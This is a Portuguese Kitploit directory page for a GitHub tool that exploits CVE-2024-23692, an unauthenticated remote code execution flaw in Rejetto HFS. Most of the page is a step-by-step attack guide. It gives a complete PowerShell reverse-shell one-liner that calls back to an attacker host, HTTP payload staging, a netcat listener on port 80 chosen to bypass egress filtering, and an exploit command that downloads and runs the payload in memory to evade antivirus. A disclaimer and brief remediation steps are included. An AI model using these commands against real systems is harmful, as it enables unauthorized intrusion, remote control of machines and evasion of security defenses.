Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-23692 — Automatiza a exploração da CVE-2024-23692 contra Rejetto HFS não corrigido, com um reverse shell PowerShell em memória, staging de payload via HTTP e evasão de gravação em disco de AV/EDR para operações autorizadas de red team. | Kitploit
Ferramentas/GitHubGitHub/sandimfz/cve-2024-23692
Geração de PayloadsExploraçãoExploração de Aplicações WebComando e ControleRed Teaming
GitHubsandimfz/cve-2024-23692

CVE-2024-23692

Automatiza a exploração da CVE-2024-23692 contra Rejetto HFS não corrigido, com um reverse shell PowerShell em memória, staging de payload via HTTP e evasão de gravação em disco de AV/EDR para operações autorizadas de red team.

Ver Repositório
17há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-23692 - Execução Remota de Código (RCE) no Rejetto HFS

Documentação tática e guia de exploração para CVE-2024-23692, uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada que afeta versões do Rejetto HTTP File Server (HFS) anteriores à 2.3m. Este guia utiliza uma técnica de In-Memory Reverse Shell (Somente RAM) para contornar com sucesso detecções de Antivírus/EDR baseadas em assinaturas de gravação em disco.

Aviso: Este repositório e seu conteúdo destinam-se estritamente a avaliações de segurança autorizadas, engajamentos de teste de penetração, simulações de bug bounty e auditoria forense defensiva. A utilização não autorizada contra ambientes de terceiros é estritamente ilegal.


Créditos e Referências

O template de verificação de automação implementado neste fluxo de prova de conceito baseia-se no repositório público desenvolvido por:

  • Fonte do Script de Exploração: VeryLazyTech - CVE-2024-23692

Fluxo de Exploração (In-Memory Reverse Shell)

Este método incorpora um modelo de implantação de stager HTTP para entregar dinamicamente uma string de payload baseada em texto ao ambiente alvo, invocando execução ao vivo diretamente da memória volátil do sistema (RAM).

Passo 1: Preparar o Script de Payload

No seu servidor local C2/atacante, crie um arquivo de texto estático chamado index.html e preencha-o com o seguinte código principal de loop TCP Socket em PowerShell:

\$c = New-Object System.Net.Sockets.TCPClient('<LHOST>',80);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){;\$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i);\$sb = (iex \$d 2>&1 | Out-String );\$sb2 = \$sb + 'PS ' + (pwd).Path + '> ';\$sbt = ([text.encoding]::ASCII).GetBytes(\$sb2);\$s.Write(\$sbt,0,\$sbt.Length);\$s.Flush()};\$c.Close()

Passo 2: Iniciar o Servidor Web Leve

Abra uma instância de terminal dentro da pasta de preparação designada que contém seu arquivo de template de payload, em seguida, inicie um listener HTTP instantâneo em Python em uma porta alternativa (por exemplo, 8080):

python3 -m http.server 8080

Passo 3: Inicializar o Listener de Rede

Abra uma sessão de terminal secundária independente para hospedar o callback persistente da shell de entrada. É altamente recomendável utilizar a porta 80 (ou 443) para contornar facilmente medidas de proteção perimetral de saída (Filtragem de Firewall de Egress):

sudo nc -lvnp 80

Passo 4: Acionar o Exploit RCE

Dispare o motor de validação automatizado visando sua infraestrutura de implantação. A chamada alvo conecta a análise de comandos através de um wrapper de execução CMD localizado para manter estabilidade ideal de string sem descartar flags de parâmetros:

./CVE-2024-23692.sh http://<TARGET_IP>:<PORT> "cmd /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>')\""

Screenshot

Remediação e Mitigação

Para eliminar completamente comprometimentos e remediar ambientes operacionais vulneráveis:

  1. Encerre e finalize imediatamente quaisquer processos de implantação do Rejetto HFS em execução na árvore do sistema:
    Get-Process -Name *hfs* | Stop-Process -Force
    
  2. Remova arquivos residuais indesejados ou payloads binários não autenticados que residam em áreas públicas de escrita:
    Remove-Item -Path "C:\Users\Public\*.exe" -Force -ErrorAction SilentlyContinue
    
  3. Atualize os ativos de implantação para a versão estável corrigida ou migre a infraestrutura de integração para plataformas alternativas modernas e seguras.
Baixar ferramenta